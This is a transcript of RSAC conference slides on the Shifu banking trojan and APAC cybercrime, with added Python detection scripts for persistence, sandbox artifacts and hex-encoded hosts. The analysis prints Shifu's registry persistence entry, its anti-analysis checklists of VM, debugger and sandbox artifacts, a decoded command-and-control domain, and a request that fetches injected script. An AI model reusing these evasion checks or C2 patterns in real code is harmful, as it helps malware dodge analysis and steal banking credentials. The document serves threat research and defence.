

Date post: 28-Mar-2018
Cybercrime Collaboration - The Changing APAC Threat Landscape (RSAC session TTA1-F01). Tal Darsan, Threat Research Team Leader, IBM Security; Etay Maor, Executive Security Advisor, IBM Security.
Transcript

SESSION ID: TTA1-F01

Cybercrime Collaboration - The Changing APAC Threat Landscape

Tal Darsan, Threat Research Team Leader, IBM Security

Etay Maor, Executive Security Advisor, IBM Security


New Targets, New Threats


Agenda

Intro – collaboration and localization

Deep dive into Shifu

The dark web

What do we do next?


Cybercriminals Share Intel!


What is Your Career Path?


Target: Singapore

It’s Not Just About Bank Accounts and Card Data

Cybercriminals are always looking for other ways to monetize

Example - Healthcare:

Seller:

Easier to steal

More profitable than a credit card

Buyer:

Harder to detect

Many opportunities


Localizing malware to APAC

Choosing specific targets

Local malvertising or spamming services

Knowledge of internal procedures of local entities

Localized content using language

Localized injections using injection shops

Local money mules


Remember Tsukuba?


Shifu Deep Dive – APAC targeting Malware


Shifu trojan introduction

Introduced by IBM Security / Trusteer in August 2015

Active in the wild since mid-2015

Initially focused on Japan, then on Eastern European financial institutions

Shares code portions with Shiz and Zeus

Shares characteristics with Gozi and Dridex


[Diagram: Shifu’s relation to Shiz, Zeus, Gozi and Dridex]


Main features

Domain generation algorithm

Theft from bank apps

Anti research

Stealth

Webinjects configurations

Wipe system restore


Main features

Anti research, VM and sandbox tools

Browser hooking and web injects parser

Keylogger

Bitcoin wallet stealer

Screenshot grabber

Certificate grabber

Endpoint classification and monitoring applications of interest

RAT and bot control module


Shifu’s Infection Chain

[Diagram: infection chain starting from the Angler EK]

1. Drops a copy of itself under %APPDATA% -> <payload’s random name>.exe

2. Writes a Windows registry persistence entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent{Decimal Number}
Data = rundll32.exe shell32.dll, ShellExec_RunDLL <payload’s random name>.exe

3. Drops an Apache server

4. Drops a financial web-injects configuration
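Added example (not from the slides): a triage check over Run-key entries for the persistence value described in step 2 above. The entry tuple layout, the "shellexec-rundll" verdict for a launcher match without the IntelPowerAgent name, and all sample values are assumptions made for the example.

```python
import re

# Added example, not from the slides: triage autorun entries for the Run value
# the slide describes (value name IntelPowerAgent plus a decimal number, data
# launching a .exe via rundll32.exe shell32.dll,ShellExec_RunDLL).
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
VALUE_NAME = re.compile(r"^IntelPowerAgent\d+$")
VALUE_DATA = re.compile(
    r"^rundll32(?:\.exe)?\s+shell32\.dll\s*,\s*ShellExec_RunDLL\s+\S+\.exe\s*$",
    re.IGNORECASE,
)


def classify_run_entry(key, name, data):
    """Return 'shifu-like' when both name and data match the slide, 'shellexec-rundll'
    when only the launcher pattern matches (assumption: still worth a look), else None."""
    if key.lower() != RUN_KEY.lower() or not VALUE_DATA.match(data):
        return None
    return "shifu-like" if VALUE_NAME.match(name) else "shellexec-rundll"


def triage_autoruns(entries):
    """entries: iterable of (key, value_name, data); returns the ones that matched."""
    out = []
    for key, name, data in entries:
        verdict = classify_run_entry(key, name, data)
        if verdict:
            out.append((name, data, verdict))
    return out


# Constructed sample entries (not from a real host); the number in the value
# name and the payload file name stand in for the random values the slide mentions.
SAMPLE_ENTRIES = [
    (RUN_KEY, "OneDrive",
     r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (RUN_KEY, "IntelPowerAgent4821",
     r"rundll32.exe shell32.dll, ShellExec_RunDLL C:\Users\u\AppData\Roaming\a8f3k2.exe"),
    (RUN_KEY, "Updater",
     r"rundll32.exe shell32.dll,ShellExec_RunDLL C:\Users\u\AppData\Roaming\x.exe"),
]
```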


Shifu main function

Deletes the Zone.Identifier flag that the OS attaches to a file downloaded from the Internet to mark its origin

Marks the bitness of the OS

Calls a function with a CRC32 value to make sure a particular process is not present; if it is, execution stops

Checks for smart-card token presence to ensure its availability in order to operate correctly; if a token is present, the main “Anti Research” validation function is passed

Calls further anti-research functions


Shifu’s Anti Research

Address         Stored CRC32   Process name
.data:0040B120  278CDF58h      vmtoolsd.exe
.data:0040B124  99DD4432h      vmwareuser.exe
.data:0040B12C  6D3323D9h      vmusrvc.exe
.data:0040B130  3BFFF885h      vmsrvc.exe
.data:0040B134  64340DCEh      vboxservice.exe
.data:0040B138  63C54474h      vboxtray.exe
.data:0040B13C  2B05B17Dh      xenservice.exe
.data:0040B144  77AE10F7h      wireshark.exe
.data:0040B148  0CE7D304Eh     dumpcap.exe
.data:0040B158  0E90ACC42h     idag.exe
.data:0040B15C  4231F0ADh      sysanalyser.exe
.data:0040B160  0D20981E0h     shift_hit.exe
.data:0040B174  6AAAE60h       idaq.exe
.data:0040B178  5BA9B1FEh      procmon.exe
.data:0040B17C  3CE2BEF3h      regmon.exe
.data:0040B180  0A945E459h     procexp.exe
.data:0040B184  877A154Bh      peid.exe
.data:0040B188  33495995h      autoruns.exe
.data:0040B194  9305F80Dh      imul.exe
.data:0040B198  0C4AAED42h     emul.exe
.data:0040B19C  14078D5Bh      apispy.exe
.data:0040B1B0  2AAA273Bh      joeboxserver.exe
.data:0040B1B4  777BE06Ch      joeboxcontrol.exe


Shifu’s Anti Research

1. Checks for the presence of the following DLLs among the loaded modules:
• sbiedll.dll
• dbghelp.dll
• api_log.dll
• dir_watch.dll
• pstorec.dll

2. Checks for the presence of the following folders and files on disk:
• c:\analysis\sandboxstarter.exe
• c:\analysis
• c:\insidetm
• c:\windows\system32\drivers\vmmouse.sys
• c:\windows\system32\drivers\vmhgfs.sys
• c:\windows\system32\drivers\vboxmouse.sys

3. Uses the Windows API functions NetServerGetInfo and NetWkstaGetInfo to obtain the current machine’s network group name and domain respectively, and compares them with the strings:
• WORKGROUP
• HOME
If neither fits, it checks whether the function output lies within the alphanumeric character range and whether it contains the string ANALYSERS.

4. Calls the function "CompNamePresentAndNotBlacklisted" to make sure the computer name doesn’t include the following strings:
• SANDBOX
• FORTINET
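As an added example (not from the slides), the four checks above and the CRC32 process table on the previous slide combined into an audit a sandbox operator can run against a description of an analysis VM, to see which artifacts Shifu would fingerprint. The environment dictionary layout and the reading of step 3 (a name other than WORKGROUP/HOME is flagged when it is not purely alphanumeric or contains ANALYSERS) are assumptions; process names are matched directly rather than through Shifu’s CRC32 routine.

```python
# Added example, not from the slides: report which of Shifu's documented
# anti-research checks an analysis VM would trip. Process names are taken from
# the CRC32 table on the slide and matched by name (the CRC32 variant is not reproduced).
WATCHED_PROCESSES = {
    "vmtoolsd.exe", "vmwareuser.exe", "vmusrvc.exe", "vmsrvc.exe",
    "vboxservice.exe", "vboxtray.exe", "xenservice.exe", "wireshark.exe",
    "dumpcap.exe", "idag.exe", "sysanalyser.exe", "shift_hit.exe", "idaq.exe",
    "procmon.exe", "regmon.exe", "procexp.exe", "peid.exe", "autoruns.exe",
    "imul.exe", "emul.exe", "apispy.exe", "joeboxserver.exe", "joeboxcontrol.exe",
}
WATCHED_DLLS = {"sbiedll.dll", "dbghelp.dll", "api_log.dll", "dir_watch.dll", "pstorec.dll"}
WATCHED_PATHS = {
    r"c:\analysis\sandboxstarter.exe", r"c:\analysis", r"c:\insidetm",
    r"c:\windows\system32\drivers\vmmouse.sys",
    r"c:\windows\system32\drivers\vmhgfs.sys",
    r"c:\windows\system32\drivers\vboxmouse.sys",
}
EXPECTED_GROUPS = {"WORKGROUP", "HOME"}
NAME_BLACKLIST = ("SANDBOX", "FORTINET")


def suspicious_group(name):
    """Step 3 of the slide. Assumption: a name other than WORKGROUP/HOME is
    suspicious when it is not purely alphanumeric or contains ANALYSERS."""
    if name.upper() in EXPECTED_GROUPS:
        return False
    return (not name.isalnum()) or ("ANALYSERS" in name.upper())


def audit_environment(env):
    """Return {check: [artifacts]}; env keys: processes, modules, paths, workgroup, domain, computer_name."""
    hits = {}
    procs = {p.lower() for p in env.get("processes", [])} & WATCHED_PROCESSES
    if procs:
        hits["process_crc32"] = sorted(procs)
    mods = {m.lower() for m in env.get("modules", [])} & WATCHED_DLLS
    if mods:
        hits["loaded_dll"] = sorted(mods)
    paths = {p.lower() for p in env.get("paths", [])} & WATCHED_PATHS
    if paths:
        hits["file_on_disk"] = sorted(paths)
    groups = [g for g in (env.get("workgroup", ""), env.get("domain", ""))
              if g and suspicious_group(g)]
    if groups:
        hits["network_group"] = groups
    names = [s for s in NAME_BLACKLIST if s in env.get("computer_name", "").upper()]
    if names:
        hits["computer_name"] = names
    return hits
```

An empty result means none of the listed artifacts is visible to these checks; it says nothing about other fingerprinting techniques.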


Shifu’s Apache Server

1. Shifu downloads an archive file, server.zip, from its C2 server

2. server.zip contains an Apache server that is deployed on the victim’s machine

Purposes:

- Decoding the address of the web-injects host and receiving the injected JavaScript from a remote Shifu server

- Modular configuration component

- Innovative approach


Shifu’s Apache Server

To decode the address of the remote webinjects server “secure.7375626a6563746472697665722e62697a.moz”, the server performs a hex-to-text conversion. In this case:

7375626a6563746472697665722e62697a = subjectdriver.biz

It then replays the request to the C2 with the correct webinjects server:

subjectdriver.biz/?c=script&v=1&b=SECUSER!WIN7X86SP1!E78ACB41&r=[bank-injection-token]
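Added example, not from the slides: the hex-to-text decoding of the hostname label shown above, applied as a detection over a few constructed DNS query log lines to flag queries whose label decodes to another host name. The "timestamp client query" log layout and the sample lines other than the slide’s hostname are assumptions.

```python
import re

# Added example, not from the slides: flag hostnames whose label is a hex
# encoding of another host name, as in the webinjects address on this slide.
HEX_LABEL = re.compile(r"^(?:[0-9a-fA-F]{2})+$")


def decode_hex_label(label):
    """Decode a pure-hex label into text; None when it is not a hidden host name."""
    if len(label) < 8 or not HEX_LABEL.match(label):
        return None
    text = bytes.fromhex(label).decode("ascii", errors="replace")
    # Accept only something shaped like a host name with at least one dot.
    if "." not in text or not re.fullmatch(r"[a-z0-9.-]+", text, re.I):
        return None
    return text


def decoded_servers(hostname):
    """All host names hidden in the hex labels of one queried hostname."""
    return [d for d in (decode_hex_label(lab) for lab in hostname.split(".")) if d]


def scan_dns_log(lines):
    """Lines are 'timestamp client query' (assumed layout); returns [(query, decoded)]."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        for decoded in decoded_servers(parts[2]):
            hits.append((parts[2], decoded))
    return hits


# Constructed sample log, not real traffic; the first query is the slide's hostname.
SAMPLE_LOG = [
    "2016-07-20T10:01:02Z 10.0.0.15 secure.7375626a6563746472697665722e62697a.moz",
    "2016-07-20T10:01:03Z 10.0.0.15 www.example.com",
    "2016-07-20T10:01:04Z 10.0.0.22 deadbeef.cdn.example.net",
]
```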


Shifu’s Configuration – Dridex similarity


Communication

botid=%s&ver=%s.%u&up=%u&os=%u&ltime=%s%d&token=%d&cn=%s&av=%s&dmn=%s

Some of Shifu’s known bot commands are:


Applications

MultiCash and MultiCash@Sign – An electronic banking platform that serves large corporations for the purpose of e-banking across the globe. MultiCash serves customers all across Europe. Shifu hunts for access credentials to the MultiCash@Sign plugin that banks enable their major customers to use.

Elba5 – An electronic banking platform vendor serving the Austrian market. Shifu hunts for Elba data that may be found on the infected machine.

HBP Hypo Office Banking – A platform that serves enterprise clients for the purpose of e-banking via multiple bank accounts. HBP serves the Austrian market. Shifu hunts for HBP customer profile data.


Applications


• iexplore.exe
• opera.exe
• firefox.exe
• chrome.exe
• maxthon.exe
• java.exe
• javaw.exe
• plugin-container.exe
• acrobat.exe
• acrod32.exe

[Diagram labels: URLDownloadToFile, HTTPS, SIGNED file.exe, infected.exx, File inspection]


Dark Web Demo


How Do We Fight Back?


Conclusions

Threat actors are reusing tools and techniques

They are using customization services to target specific regions

Cybercrime intelligence collection is not limited to anti-malware tools – process and procedures are scrutinized

Malware is AV, research AND malware aware

Cybercrime skill gap compression!!!


The Pyramid of Pain

Source: David Bianco


What are the next steps?

Threat intelligence collaboration

Malware detection and behavior biometrics authentication

On a different note: design, implement AND TEST incident response

